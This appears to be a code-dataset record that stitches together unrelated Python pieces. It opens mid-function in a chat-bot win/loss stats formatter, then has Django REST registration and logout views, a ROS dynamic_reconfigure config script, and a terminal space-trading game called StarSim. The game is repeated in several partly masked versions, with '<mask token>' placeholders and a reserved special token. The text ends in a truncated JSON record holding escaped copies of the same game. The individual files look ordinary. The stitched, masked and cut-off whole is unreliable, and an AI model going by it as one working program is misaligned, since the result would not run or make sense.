elif float(loseCount) <= 0:
winRate = ' 100'
else:
winRate = str((float(winCount) / (float(winCount) + float(loseCount))) * 100)
# truncate win rate and create string with player info
winRate = winRate[0:4].rjust(9)
playerString += playerName + winCount + loseCount + winRate + ' %\n'
# calculate padding for name field and create header final strings
namePaddingLen = roundMultiple((maxPlayerLen + 2), 2)
header = ' |' + 'Name'.center(namePaddingLen) + '| Wins | Losses | Win Rate |\n'
divider = ('-' * len(header)) + '\n'
sendString = '```md\n' + header + divider + playerString + '```'
# return the constructed string
if len(returnMsg) > 0:
returnMsg = returnMsg + sendString
return returnMsg
return sendString
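
# Usage sketch: a quick smoke test of the helpers above. 'chess.csv', 'alice'
# and 'bob' are hypothetical stand-ins for a database and player names created
# elsewhere by the bot; msgChannel is unused by these functions, so None is
# passed. If the file does not exist, each call simply returns the DB error.
if __name__ == '__main__':
    print(editPlayer(None, 'chess.csv', 'alice', 'ADD'))
    print(editPlayer(None, 'chess.csv', 'bob', 'ADD'))
    print(incrementStats(None, 'chess.csv', 'alice', ['bob']))
    print(dumpStats(None, 'chess.csv', sortType='WINS'))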
from rest_framework.views import APIView
from django.shortcuts import get_object_or_404
from rest_framework.response import Response
from django.contrib.auth import logout
from rest_framework import status
from rest_framework.authtoken.models import Token
from .serilizer import UserSerializer  # module name kept as spelled in the project


class RegistrationView(APIView):
    serializer_class = UserSerializer

    def post(self, request):
        serializer = UserSerializer(data=request.data)
        if serializer.is_valid():
            # save the new account and return its auth token alongside a message
            account = serializer.save()
            user_name = serializer.validated_data['user_name']
            data = {'response': 'user with username ' + str(user_name) + ' created'}
            data['key'] = get_object_or_404(Token, user=account).key
            return Response(data, status=status.HTTP_201_CREATED)
        else:
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)


class LogoutView(APIView):
    def get(self, request):
        logout(request)
        return Response({'response': 'logged out'}, status=status.HTTP_200_OK)
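
# Usage sketch: one way to route these views; the URL paths and names below
# are assumptions, not taken from the project.
#
#   # urls.py
#   from django.urls import path
#   from .views import RegistrationView, LogoutView
#
#   urlpatterns = [
#       path('register/', RegistrationView.as_view(), name='register'),
#       path('logout/', LogoutView.as_view(), name='logout'),
#   ]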
#!/usr/bin/env python

# set up parameters that we care about
PACKAGE = 'jsk_pcl_ros'

from dynamic_reconfigure.parameter_generator_catkin import *

from math import pi

gen = ParameterGenerator()
gen.add("segment_connect_normal_threshold", double_t, 0,
        "threshold of normal to connect clusters", 0.9, 0.0, 1.0)
gen.add("ewma_tau", double_t, 0,
        "tau parameter of EWMA to connect clusters", 0.2, 0.0, 1.0)
gen.add("outlier_threshold", double_t, 0, "outlier threshold", 0.01, 0.0, 0.1)
gen.add("max_iterations", int_t, 0, "maximum iteration", 100, 1, 10000)
gen.add("min_indices", int_t, 0, "minimum number of indices", 1000, 1, 10000)

exit(gen.generate(PACKAGE, "jsk_pcl_ros", "LineSegmentCollector"))
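
# Usage sketch: dynamic_reconfigure turns this script into a generated
# LineSegmentCollectorConfig class; a minimal Python node could serve it as
# below (the node name here is an assumption).
#
#   import rospy
#   from dynamic_reconfigure.server import Server
#   from jsk_pcl_ros.cfg import LineSegmentCollectorConfig
#
#   def callback(config, level):
#       rospy.loginfo('outlier_threshold set to %f' % config.outlier_threshold)
#       return config
#
#   rospy.init_node('line_segment_collector')
#   Server(LineSegmentCollectorConfig, callback)
#   rospy.spin()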
<|reserved_special_token_0|>
def spacePortMenu(player, planet):
global turnCounter
while True:
cleanScreen()
print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')
print('Enter 1 to jump to a agri planet (risk 5%)')
print('Enter 2 to jump to a tech planet (risk 10%)')
print('Enter 3 to jump to a war planet (risk 20%)')
userInput = input('Or enter x to exit:')
risk = 0
if userInput == 'x':
return planet
elif userInput == '1':
risk = 5
elif userInput == '2':
risk = 10
else:
risk = 20
if random.randint(0, 100) <= risk:
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:
cleanScreen()
print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')
player.printStats()
print('**********************************************************')
market = planet.getMarket()
print('Price for Food = ', market['Food'])
print('Price for Tech = ', market['Tech'])
print('**********************************************************')
userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')
str = ''
if userInput == '1':
str = 'Food'
elif userInput == '2':
str = 'Tech'
else:
break
print('**********************************************************')
max = 0
if market[str] * player.freeCargoUnits <= player.getCredits():
max = player.freeCargoUnits
else:
max = int(player.getCredits() / market[str])
print('Price for ' + str + ' = ', market[str])
secondInput = input(
'Would you like to buy (enter b) or sell (enter s)?')
if secondInput == 'b':
print('You can buy a maximum of', max, 'units')
nr = input('How much would you like to buy? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if player.getCredits() > market[str] * nr and nr <= max:
if str == 'Food':
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str] * nr)
player.updateCargoUnits()
elif str == 'Food':
print('You can sell a maximum of', player.getFood(), 'food units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getFood():
player.sellFood(nr)
player.setCredits(player.getCredits() + nr * market['Food']
)
else:
print('You can sell a maximum of', player.getTech(), 'tech units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getTech():
player.sellTech(nr)
player.setCredits(player.getCredits() + nr * market['Tech']
)
<mask token>
<mask token>
def cleanScreen():
for i in range(0, 50):
print('')
<mask token>
def shipyardMenu(player, planet):
while True:
cleanScreen()
print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')
player.printStats()
print('**********************************************************')
shipList = planet.getShipyard()
print('Available Ships:')
print('**********************************************************')
i = 0
for s in shipList:
print('Nr.:' + str(i) + ':' + s.toString())
i += 1
print('**********************************************************')
userInput = input(
            'Enter the number you would like to buy or x to leave:')
if userInput == 'x':
break
else:
ui = int(userInput)
            if ui < i:
if player.getCredits() > shipList[ui].getPrice():
if type(shipList[ui]) == FighterShip:
player.addFighterShip(shipList[ui])
player.updateFirePower()
else:
player.addCargoShip(shipList[ui])
player.updateCargoUnits()
player.setCredits(player.getCredits() - shipList[ui].
getPrice())
player.updateMaintenance()
del shipList[ui]
else:
                print('Wrong number, try again...')
def spacePortMenu(player, planet):
global turnCounter
while True:
cleanScreen()
print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')
        print('Enter 1 to jump to an agri planet (risk 5%)')
print('Enter 2 to jump to a tech planet (risk 10%)')
print('Enter 3 to jump to a war planet (risk 20%)')
userInput = input('Or enter x to exit:')
risk = 0
if userInput == 'x':
return planet
elif userInput == '1':
risk = 5
elif userInput == '2':
risk = 10
else:
risk = 20
if random.randint(0, 100) <= risk:
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:
cleanScreen()
print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')
player.printStats()
print('**********************************************************')
market = planet.getMarket()
print('Price for Food = ', market['Food'])
print('Price for Tech = ', market['Tech'])
print('**********************************************************')
userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')
str = ''
if userInput == '1':
str = 'Food'
elif userInput == '2':
str = 'Tech'
else:
break
print('**********************************************************')
max = 0
if market[str] * player.freeCargoUnits <= player.getCredits():
max = player.freeCargoUnits
else:
max = int(player.getCredits() / market[str])
print('Price for ' + str + ' = ', market[str])
secondInput = input(
'Would you like to buy (enter b) or sell (enter s)?')
if secondInput == 'b':
print('You can buy a maximum of', max, 'units')
nr = input('How much would you like to buy? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if player.getCredits() > market[str] * nr and nr <= max:
if str == 'Food':
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str] * nr)
player.updateCargoUnits()
elif str == 'Food':
print('You can sell a maximum of', player.getFood(), 'food units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getFood():
player.sellFood(nr)
player.setCredits(player.getCredits() + nr * market['Food']
)
else:
print('You can sell a maximum of', player.getTech(), 'tech units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getTech():
player.sellTech(nr)
player.setCredits(player.getCredits() + nr * market['Tech']
)
def menu(player):
global turnCounter
notFinished = True
planet = Planet.Planet(random.randint(1, 3))
while notFinished:
cleanScreen()
if player.getCredits() < 0:
print(
'Sorry, but you ran out of credits and therefore lost the game in round,'
, turnCounter, '!')
break
print('**********************************************************')
print('Turn nr.', turnCounter,
'in this glorious space trading simulation')
player.printStats()
print('**********************************************************')
print('You are on Planet:', planet.getName())
print('**********************************************************')
print('Enter 1 to go to the shipyard')
print('Enter 2 to go to the market')
print('Enter 3 to go to the spaceport')
print('Enter exit to leave the game')
userinput = input('Your Input:')
if userinput == '1':
shipyardMenu(player, planet)
elif userinput == '2':
marketMenu(player, planet)
elif userinput == '3':
planet = spacePortMenu(player, planet)
else:
notFinished = False
<mask token>
<mask token>
turnCounter = 0
def cleanScreen():
for i in range(0, 50):
print('')
def spacePirates(player):
while True:
cleanScreen()
print('*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****')
playerFirepower = player.getTotalFirepower()
piratesFirepower = int(playerFirepower * (1 + random.randint(-20,
20) / 100))
if random.randint(0, playerFirepower
) > playerFirepower / 3 and random.randint(0, piratesFirepower
) < piratesFirepower / 3 or playerFirepower == 0:
            print('Damn, you got robbed by the pirates!')
print('You lost all your cargo and half your money!')
player.clearTech()
player.clearFood()
player.updateCargoUnits()
player.setCredits(player.getCredits() / 2)
else:
print('Lucky you! Your fighters drove them off!')
print('**********************************************************')
input('Hit enter to continue')
break
def shipyardMenu(player, planet):
while True:
cleanScreen()
print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')
player.printStats()
print('**********************************************************')
shipList = planet.getShipyard()
print('Available Ships:')
print('**********************************************************')
i = 0
for s in shipList:
print('Nr.:' + str(i) + ':' + s.toString())
i += 1
print('**********************************************************')
userInput = input(
            'Enter the number you would like to buy or x to leave:')
if userInput == 'x':
break
else:
ui = int(userInput)
            if ui < i:
if player.getCredits() > shipList[ui].getPrice():
if type(shipList[ui]) == FighterShip:
player.addFighterShip(shipList[ui])
player.updateFirePower()
else:
player.addCargoShip(shipList[ui])
player.updateCargoUnits()
player.setCredits(player.getCredits() - shipList[ui].
getPrice())
player.updateMaintenance()
del shipList[ui]
else:
                print('Wrong number, try again...')
def spacePortMenu(player, planet):
global turnCounter
while True:
cleanScreen()
print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')
        print('Enter 1 to jump to an agri planet (risk 5%)')
print('Enter 2 to jump to a tech planet (risk 10%)')
print('Enter 3 to jump to a war planet (risk 20%)')
userInput = input('Or enter x to exit:')
risk = 0
if userInput == 'x':
return planet
elif userInput == '1':
risk = 5
elif userInput == '2':
risk = 10
else:
risk = 20
if random.randint(0, 100) <= risk:
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:
cleanScreen()
print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')
player.printStats()
print('**********************************************************')
market = planet.getMarket()
print('Price for Food = ', market['Food'])
print('Price for Tech = ', market['Tech'])
print('**********************************************************')
userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')
str = ''
if userInput == '1':
str = 'Food'
elif userInput == '2':
str = 'Tech'
else:
break
print('**********************************************************')
max = 0
if market[str] * player.freeCargoUnits <= player.getCredits():
max = player.freeCargoUnits
else:
max = int(player.getCredits() / market[str])
print('Price for ' + str + ' = ', market[str])
secondInput = input(
'Would you like to buy (enter b) or sell (enter s)?')
if secondInput == 'b':
print('You can buy a maximum of', max, 'units')
nr = input('How much would you like to buy? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if player.getCredits() > market[str] * nr and nr <= max:
if str == 'Food':
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str] * nr)
player.updateCargoUnits()
elif str == 'Food':
print('You can sell a maximum of', player.getFood(), 'food units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getFood():
player.sellFood(nr)
player.setCredits(player.getCredits() + nr * market['Food']
)
else:
print('You can sell a maximum of', player.getTech(), 'tech units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getTech():
player.sellTech(nr)
player.setCredits(player.getCredits() + nr * market['Tech']
)
def menu(player):
global turnCounter
notFinished = True
planet = Planet.Planet(random.randint(1, 3))
while notFinished:
cleanScreen()
if player.getCredits() < 0:
print(
'Sorry, but you ran out of credits and therefore lost the game in round,'
, turnCounter, '!')
break
print('**********************************************************')
print('Turn nr.', turnCounter,
'in this glorious space trading simulation')
player.printStats()
print('**********************************************************')
print('You are on Planet:', planet.getName())
print('**********************************************************')
print('Enter 1 to go to the shipyard')
print('Enter 2 to go to the market')
print('Enter 3 to go to the spaceport')
print('Enter exit to leave the game')
userinput = input('Your Input:')
if userinput == '1':
shipyardMenu(player, planet)
elif userinput == '2':
marketMenu(player, planet)
elif userinput == '3':
planet = spacePortMenu(player, planet)
else:
notFinished = False
print('***************************************')
print(' Welcome to StarSim')
print('***************************************')
name = input('Please enter your Name:')
player = Player.Player(name)
menu(player)
<mask token>
import Ship
import Player
import Planet
import random
from FighterShip import FighterShip
turnCounter = 0
def cleanScreen():
for i in range(0, 50):
print('')
def spacePirates(player):
while True:
cleanScreen()
print('*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****')
playerFirepower = player.getTotalFirepower()
piratesFirepower = int(playerFirepower * (1 + random.randint(-20,
20) / 100))
if random.randint(0, playerFirepower
) > playerFirepower / 3 and random.randint(0, piratesFirepower
) < piratesFirepower / 3 or playerFirepower == 0:
            print('Damn, you got robbed by the pirates!')
print('You lost all your cargo and half your money!')
player.clearTech()
player.clearFood()
player.updateCargoUnits()
player.setCredits(player.getCredits() / 2)
else:
print('Lucky you! Your fighters drove them off!')
print('**********************************************************')
input('Hit enter to continue')
break
def shipyardMenu(player, planet):
while True:
cleanScreen()
print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')
player.printStats()
print('**********************************************************')
shipList = planet.getShipyard()
print('Available Ships:')
print('**********************************************************')
i = 0
for s in shipList:
print('Nr.:' + str(i) + ':' + s.toString())
i += 1
print('**********************************************************')
userInput = input(
            'Enter the number you would like to buy or x to leave:')
if userInput == 'x':
break
else:
ui = int(userInput)
            if ui < i:
if player.getCredits() > shipList[ui].getPrice():
if type(shipList[ui]) == FighterShip:
player.addFighterShip(shipList[ui])
player.updateFirePower()
else:
player.addCargoShip(shipList[ui])
player.updateCargoUnits()
player.setCredits(player.getCredits() - shipList[ui].
getPrice())
player.updateMaintenance()
del shipList[ui]
else:
                print('Wrong number, try again...')
def spacePortMenu(player, planet):
global turnCounter
while True:
cleanScreen()
print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')
        print('Enter 1 to jump to an agri planet (risk 5%)')
print('Enter 2 to jump to a tech planet (risk 10%)')
print('Enter 3 to jump to a war planet (risk 20%)')
userInput = input('Or enter x to exit:')
risk = 0
if userInput == 'x':
return planet
elif userInput == '1':
risk = 5
elif userInput == '2':
risk = 10
else:
risk = 20
if random.randint(0, 100) <= risk:
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:
cleanScreen()
print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')
player.printStats()
print('**********************************************************')
market = planet.getMarket()
print('Price for Food = ', market['Food'])
print('Price for Tech = ', market['Tech'])
print('**********************************************************')
userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')
str = ''
if userInput == '1':
str = 'Food'
elif userInput == '2':
str = 'Tech'
else:
break
print('**********************************************************')
max = 0
if market[str] * player.freeCargoUnits <= player.getCredits():
max = player.freeCargoUnits
else:
max = int(player.getCredits() / market[str])
print('Price for ' + str + ' = ', market[str])
secondInput = input(
'Would you like to buy (enter b) or sell (enter s)?')
if secondInput == 'b':
print('You can buy a maximum of', max, 'units')
nr = input('How much would you like to buy? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if player.getCredits() > market[str] * nr and nr <= max:
if str == 'Food':
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str] * nr)
player.updateCargoUnits()
elif str == 'Food':
print('You can sell a maximum of', player.getFood(), 'food units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getFood():
player.sellFood(nr)
player.setCredits(player.getCredits() + nr * market['Food']
)
else:
print('You can sell a maximum of', player.getTech(), 'tech units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getTech():
player.sellTech(nr)
player.setCredits(player.getCredits() + nr * market['Tech']
)
def menu(player):
global turnCounter
notFinished = True
planet = Planet.Planet(random.randint(1, 3))
while notFinished:
cleanScreen()
if player.getCredits() < 0:
print(
'Sorry, but you ran out of credits and therefore lost the game in round,'
, turnCounter, '!')
break
print('**********************************************************')
print('Turn nr.', turnCounter,
'in this glorious space trading simulation')
player.printStats()
print('**********************************************************')
print('You are on Planet:', planet.getName())
print('**********************************************************')
print('Enter 1 to go to the shipyard')
print('Enter 2 to go to the market')
print('Enter 3 to go to the spaceport')
print('Enter exit to leave the game')
userinput = input('Your Input:')
if userinput == '1':
shipyardMenu(player, planet)
elif userinput == '2':
marketMenu(player, planet)
elif userinput == '3':
planet = spacePortMenu(player, planet)
else:
notFinished = False
print('***************************************')
print(' Welcome to StarSim')
print('***************************************')
name = input('Please enter your Name:')
player = Player.Player(name)
menu(player)
'''
Created on 17.05.2018
@author: markus
'''
import Ship
import Player
import Planet
import random
from FighterShip import FighterShip
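# global turn counter; advanced once per jump made from the spaceport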
turnCounter = 0
def cleanScreen():
for i in range(0,50):
print("")
def spacePirates(player):#space pirates attack, their firepower is +/-20% of player firepower
while True:# loop
cleanScreen()
print("*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****")
playerFirepower = player.getTotalFirepower()
piratesFirepower = int(playerFirepower*(1+random.randint(-20,20)/100))
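        # outcome roll: the player is robbed when the random draws against both
        # fleets' firepower land in the losing band, or outright with no fighters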
if ((random.randint(0,playerFirepower) > playerFirepower/3) and
(random.randint(0,piratesFirepower) < piratesFirepower/3) or (playerFirepower == 0)):
print("Damm, you got robbed by the pirates!")
print("You lost all your cargo and half your money!")
player.clearTech()
player.clearFood()
player.updateCargoUnits()
player.setCredits(player.getCredits()/2)
else:
print("Lucky you! Your fighters drove them off!")
print("**********************************************************")
input("Hit enter to continue")
break
def shipyardMenu(player, planet):
while True:# loop
cleanScreen()
print("*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****")
player.printStats()
print("**********************************************************")
shipList = planet.getShipyard()
print("Available Ships:")
print("**********************************************************")
i = 0
for s in shipList:
print("Nr.:"+str(i)+":"+s.toString())
i += 1
print("**********************************************************")
userInput = input("Enter the number you would like to by or x to leave:")
if (userInput == "x"):
break;
else:
ui = int(userInput)
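            # only ships 0..i-1 are actually listed, so reject any higher index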
            if (ui < i):
if(player.getCredits() > shipList[ui].getPrice()): #has enough money
if(type(shipList[ui]) == FighterShip):
player.addFighterShip(shipList[ui])
player.updateFirePower()
else:
player.addCargoShip(shipList[ui])
player.updateCargoUnits()
player.setCredits(player.getCredits() - shipList[ui].getPrice())
player.updateMaintenance()
del shipList[ui]
else:
print("wrong number, try again ....")
def spacePortMenu(player, planet):
global turnCounter
while True:# loop
cleanScreen()
print("****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****")
print("Enter 1 to jump to a agri planet (risk 5%)")
print("Enter 2 to jump to a tech planet (risk 10%)")
print("Enter 3 to jump to a war planet (risk 20%)")
userInput = input("Or enter x to exit:")
risk = 0
if (userInput == "x"):
return planet
elif (userInput == "1"):
risk = 5
elif(userInput == "2"):
risk = 10
else:
risk = 20
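        # roll the pirate encounter against the chosen route's risk, then charge
        # fleet maintenance and advance the global turn counter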
if (random.randint(0,100) <= risk):
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:# loop
cleanScreen()
print("*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******")
player.printStats()
print("**********************************************************")
market = planet.getMarket()
print("Price for Food = ",market["Food"])
print("Price for Tech = ",market["Tech"])
print("**********************************************************")
userInput = input("Enter 1 for Food, 2 for Tech or x for exit:")
str =""
if (userInput == "1"):
str = "Food"
elif(userInput == "2"):
str= "Tech"
else:
break
print("**********************************************************")
max = 0
if(market[str]*player.freeCargoUnits <= player.getCredits()):#enough credit?
max = player.freeCargoUnits
else:
max = int(player.getCredits()/market[str])
print("Price for "+str+" = ",market[str])
secondInput = input("Would you like to buy (enter b) or sell (enter s)?")
if (secondInput == "b"):#buying
print("You can buy a maximum of",max,"units")
nr = input("How much would you like to buy? Or press x to exit")
if (nr == "x"):
pass
else:
nr = int(nr)
if((player.getCredits() > market[str]*nr) and (nr <= max)): #has enough money and space
if (str == "Food"):
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str]*nr)
player.updateCargoUnits()
else:#selling
if (str == "Food"):
print("You can sell a maximum of",player.getFood(),"food units")
nr = input("How much would you like to sell? Or press x to exit")
if (nr == "x"):
pass
else:
nr = int(nr)
if (nr <= player.getFood()):
player.sellFood(nr)
player.setCredits(player.getCredits() + nr*market["Food"])
else:
print("You can sell a maximum of",player.getTech(),"tech units")
nr = input("How much would you like to sell? Or press x to exit")
if (nr == "x"):
pass
else:
nr = int(nr)
if (nr <= player.getTech()):
player.sellTech(nr)
player.setCredits(player.getCredits() + nr*market["Tech"])
def menu(player):
global turnCounter
notFinished = True
planet = Planet.Planet(random.randint(1,3))
while notFinished:#main game loop
cleanScreen()
if (player.getCredits() < 0):
print("Sorry, but you ran out of credits and therefore lost the game in round,",turnCounter,"!")
break
print("**********************************************************")
print("Turn nr.",turnCounter,"in this glorious space trading simulation")
player.printStats()
print("**********************************************************")
print("You are on Planet:",planet.getName())
print("**********************************************************")
print("Enter 1 to go to the shipyard")
print("Enter 2 to go to the market")
print("Enter 3 to go to the spaceport")
print("Enter exit to leave the game")
userinput = input("Your Input:")
if (userinput == "1"):
shipyardMenu(player, planet)
elif (userinput == "2"):
marketMenu(player, planet)
elif (userinput == "3"):
planet = spacePortMenu(player, planet)
else:
notFinished = False
print("***************************************")
print(" Welcome to StarSim")
print("***************************************")
name = input("Please enter your Name:")
player = Player.Player(name)
menu(player)
|
flexible
|
{
"blob_id": "97611fef5faafe660c7640e4a5aec8456e52135c",
"index": 9960,
"step-1": "<mask token>\n\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:\n cleanScreen()\n print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')\n print('Enter 1 to jump to a agri planet (risk 5%)')\n print('Enter 2 to jump to a tech planet (risk 10%)')\n print('Enter 3 to jump to a war planet (risk 20%)')\n userInput = input('Or enter x to exit:')\n risk = 0\n if userInput == 'x':\n return planet\n elif userInput == '1':\n risk = 5\n elif userInput == '2':\n risk = 10\n else:\n risk = 20\n if random.randint(0, 100) <= risk:\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1\n return Planet.Planet(int(userInput))\n\n\ndef marketMenu(player, planet):\n while True:\n cleanScreen()\n print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')\n player.printStats()\n print('**********************************************************')\n market = planet.getMarket()\n print('Price for Food = ', market['Food'])\n print('Price for Tech = ', market['Tech'])\n print('**********************************************************')\n userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')\n str = ''\n if userInput == '1':\n str = 'Food'\n elif userInput == '2':\n str = 'Tech'\n else:\n break\n print('**********************************************************')\n max = 0\n if market[str] * player.freeCargoUnits <= player.getCredits():\n max = player.freeCargoUnits\n else:\n max = int(player.getCredits() / market[str])\n print('Price for ' + str + ' = ', market[str])\n secondInput = input(\n 'Would you like to buy (enter b) or sell (enter s)?')\n if secondInput == 'b':\n print('You can buy a maximum of', max, 'units')\n nr = input('How much would you like to buy? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if player.getCredits() > market[str] * nr and nr <= max:\n if str == 'Food':\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str] * nr)\n player.updateCargoUnits()\n elif str == 'Food':\n print('You can sell a maximum of', player.getFood(), 'food units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getFood():\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr * market['Food']\n )\n else:\n print('You can sell a maximum of', player.getTech(), 'tech units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getTech():\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr * market['Tech']\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef cleanScreen():\n for i in range(0, 50):\n print('')\n\n\n<mask token>\n\n\ndef shipyardMenu(player, planet):\n while True:\n cleanScreen()\n print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')\n player.printStats()\n print('**********************************************************')\n shipList = planet.getShipyard()\n print('Available Ships:')\n print('**********************************************************')\n i = 0\n for s in shipList:\n print('Nr.:' + str(i) + ':' + s.toString())\n i += 1\n print('**********************************************************')\n userInput = input(\n 'Enter the number you would like to by or x to leave:')\n if userInput == 'x':\n break\n else:\n ui = int(userInput)\n if ui <= i:\n if player.getCredits() > shipList[ui].getPrice():\n if type(shipList[ui]) == FighterShip:\n player.addFighterShip(shipList[ui])\n player.updateFirePower()\n else:\n player.addCargoShip(shipList[ui])\n player.updateCargoUnits()\n player.setCredits(player.getCredits() - shipList[ui].\n getPrice())\n player.updateMaintenance()\n del shipList[ui]\n else:\n print('wrong number, try again ....')\n\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:\n cleanScreen()\n print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')\n print('Enter 1 to jump to a agri planet (risk 5%)')\n print('Enter 2 to jump to a tech planet (risk 10%)')\n print('Enter 3 to jump to a war planet (risk 20%)')\n userInput = input('Or enter x to exit:')\n risk = 0\n if userInput == 'x':\n return planet\n elif userInput == '1':\n risk = 5\n elif userInput == '2':\n risk = 10\n else:\n risk = 20\n if random.randint(0, 100) <= risk:\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1\n return Planet.Planet(int(userInput))\n\n\ndef marketMenu(player, planet):\n while True:\n cleanScreen()\n print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')\n player.printStats()\n print('**********************************************************')\n market = planet.getMarket()\n print('Price for Food = ', market['Food'])\n print('Price for Tech = ', market['Tech'])\n print('**********************************************************')\n userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')\n str = ''\n if userInput == '1':\n str = 'Food'\n elif userInput == '2':\n str = 'Tech'\n else:\n break\n print('**********************************************************')\n max = 0\n if market[str] * player.freeCargoUnits <= player.getCredits():\n max = player.freeCargoUnits\n else:\n max = int(player.getCredits() / market[str])\n print('Price for ' + str + ' = ', market[str])\n secondInput = input(\n 'Would you like to buy (enter b) or sell (enter s)?')\n if secondInput == 'b':\n print('You can buy a maximum of', max, 'units')\n nr = input('How much would you like to buy? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if player.getCredits() > market[str] * nr and nr <= max:\n if str == 'Food':\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str] * nr)\n player.updateCargoUnits()\n elif str == 'Food':\n print('You can sell a maximum of', player.getFood(), 'food units')\n nr = input('How much would you like to sell? 
Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getFood():\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr * market['Food']\n )\n else:\n print('You can sell a maximum of', player.getTech(), 'tech units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getTech():\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr * market['Tech']\n )\n\n\ndef menu(player):\n global turnCounter\n notFinished = True\n planet = Planet.Planet(random.randint(1, 3))\n while notFinished:\n cleanScreen()\n if player.getCredits() < 0:\n print(\n 'Sorry, but you ran out of credits and therefore lost the game in round,'\n , turnCounter, '!')\n break\n print('**********************************************************')\n print('Turn nr.', turnCounter,\n 'in this glorious space trading simulation')\n player.printStats()\n print('**********************************************************')\n print('You are on Planet:', planet.getName())\n print('**********************************************************')\n print('Enter 1 to go to the 